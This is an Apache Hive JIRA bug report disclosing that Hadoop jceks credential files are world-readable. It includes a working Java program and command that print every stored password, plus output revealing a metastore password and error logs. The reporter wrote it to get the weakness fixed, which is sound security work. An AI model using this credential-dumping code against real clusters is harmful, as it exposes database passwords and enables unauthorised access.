Oleksiy Sayankin created HIVE-19746: ---------------------------------------
Summary: Hadoop credential provider allows to read passwords Key: HIVE-19746 URL: https://issues.apache.org/jira/browse/HIVE-19746 Project: Hive Issue Type: Bug Reporter: Oleksiy Sayankin Assignee: Oleksiy Sayankin This simple program allows to read any password from any {{jceks}} file: {code} package com.test.app; import java.util.List; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.security.alias.CredentialProvider; import org.apache.hadoop.security.alias.CredentialProviderFactory; import java.io.IOException; public class PasswordReader { public static void main(String[] args) throws IOException { if (args == null || args.length == 0){ throw new IllegalArgumentException("Credential provider path is to set"); } String credentialProviderPath = args[0]; Configuration configuration = new Configuration(); configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath); CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0); List<String> aliases = credentialProvider.getAliases(); for(String alias : aliases){ System.out.println(alias + " = " + new String(configuration.getPassword(alias))); } } } {code} {code} java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks {code} *RESULT* {code} javax.jdo.option.connectionpassword = 123456 {code} File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable permissions here, because Hive is configured for impersonation to allow users user than {{hdfs}} connect to HiveServer2. When removed world readable permissions I got the exception: {code} 2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error 2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485) at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279) {code} Any ideas how to protect passwords? -- This message was sent by Atlassian JIRA (v7.6.3#76005)